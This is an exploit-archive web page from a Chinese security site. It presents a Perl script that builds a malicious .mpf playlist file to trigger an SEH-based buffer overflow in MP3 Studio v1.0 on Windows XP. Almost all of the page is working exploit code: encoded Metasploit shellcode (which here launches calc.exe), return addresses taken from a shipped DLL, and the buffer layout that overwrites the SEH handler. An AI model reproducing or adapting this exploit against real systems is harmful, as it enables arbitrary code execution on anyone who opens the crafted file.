首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MP3 Studio v1.0 (mpf File) Local BOF Exploit (SEH)
来源:www.vfcocus.net 作者:Koshi 发布时间:2009-07-29  

#!/usr/bin/perl
#
# MP3 Studio v1.0 (mpf File) Local BOF Exploit (SEH)
# Exploited by: Koshi
# Download: http://www.software112.com/products/mp3-millennium+download.html
# Based on PoC/findings by HACK4LOVE ( http://milw0rm.com/exploits/9277 )
# Tested on WinXP SP3
#
# I've used addresses from "xuadio.dll", which is shipped with the package.
#

# win32_exec -  EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66".
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x76\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x49\x79\x4b\x4c\x4d".
"\x38\x43\x74\x67\x70\x63\x30\x67\x70\x4c\x4b\x41\x55\x37\x4c\x6c".
"\x4b\x41\x6c\x73\x35\x53\x48\x64\x41\x4a\x4f\x6c\x4b\x70\x4f\x67".
"\x68\x6c\x4b\x41\x4f\x57\x50\x45\x51\x5a\x4b\x53\x79\x4e\x6b\x74".
"\x74\x6c\x4b\x76\x61\x38\x6e\x64\x71\x59\x50\x6e\x79\x4e\x4c\x6b".
"\x34\x79\x50\x63\x44\x73\x37\x4a\x61\x69\x5a\x44\x4d\x76\x61\x6b".
"\x72\x7a\x4b\x4b\x44\x35\x6b\x50\x54\x77\x54\x65\x54\x71\x65\x4d".
"\x35\x6e\x6b\x61\x4f\x64\x64\x65\x51\x7a\x4b\x63\x56\x4c\x4b\x56".
"\x6c\x50\x4b\x4e\x6b\x43\x6f\x47\x6c\x65\x51\x6a\x4b\x6c\x4b\x55".
"\x4c\x6c\x4b\x64\x41\x68\x6b\x6d\x59\x63\x6c\x45\x74\x75\x54\x59".
"\x53\x36\x51\x4b\x70\x71\x74\x6e\x6b\x67\x30\x30\x30\x6f\x75\x6b".
"\x70\x30\x78\x64\x4c\x4c\x4b\x37\x30\x44\x4c\x6e\x6b\x54\x30\x47".
"\x6c\x6e\x4d\x6e\x6b\x53\x58\x75\x58\x6a\x4b\x76\x69\x4e\x6b\x6b".
"\x30\x6c\x70\x37\x70\x47\x70\x35\x50\x4c\x4b\x50\x68\x57\x4c\x51".
"\x4f\x35\x61\x6c\x36\x63\x50\x52\x76\x4f\x79\x6c\x38\x6b\x33\x6f".
"\x30\x31\x6b\x36\x30\x33\x58\x73\x4e\x69\x48\x6b\x52\x44\x33\x55".
"\x38\x6d\x48\x4b\x4e\x4d\x5a\x74\x4e\x50\x57\x4b\x4f\x48\x67\x71".
"\x73\x62\x41\x32\x4c\x45\x33\x56\x4e\x55\x35\x61\x68\x31\x75\x75".
"\x50\x66";

my $jmpe = "\x3f\x5e\x03\x10";   # 0x10035E3F jmp esp (xaudio.dll)
my $nseh = "\xeb\xf1\x90\x90";   # Get back to where we once belong.
my $eseh = "\xfd\x61\x03\x10";   # 0x100361FD jmp edi (xaudio.dll)
my $phun = "\x33\xc0\x33\x45\xf8\x04\x05\xff\xe0";
#
# XOR EAX,EAX
# XOR EAX,DWORD PTR SS:[EBP-8]
# ADD AL,5
# JMP EAX
#
my $leng = 4103 - length($shellcode) - length($phun);
my $buff = "\x41"x$leng;
my $tuff = "http:".$buff.$shellcode.$phun.$jmpe.$nseh.$eseh;

open (MYFILE, '>>exploit.mpf');
print MYFILE "$tuff";
close (MYFILE);
print "Exploit file has been created. ( exploit.mpf )\n";


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PunBB Reputation.php Mod <= 2.
·Millenium MP3 Studio 1.0 .mpf
·MP3 Studio 1.0 (.mpf /.m3u Fil
·WINMOD 1.4 (.lst) Local Stack
·MP3 Studio 1.10 (m3u File) Loc
·PunBB Reputation.php module ve
·PunBB Automatic Image Upload <
·PunBB Automatic Image Upload <
·NcFTPd <= 2.8.5 Remote Jail Br
·ISC BIND 9 Remote Dynamic Upda
·MP3 Studio 1.0 (.mpf /.m3u Fil
·Compface 1.1.5 (.xbm File) Loc
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved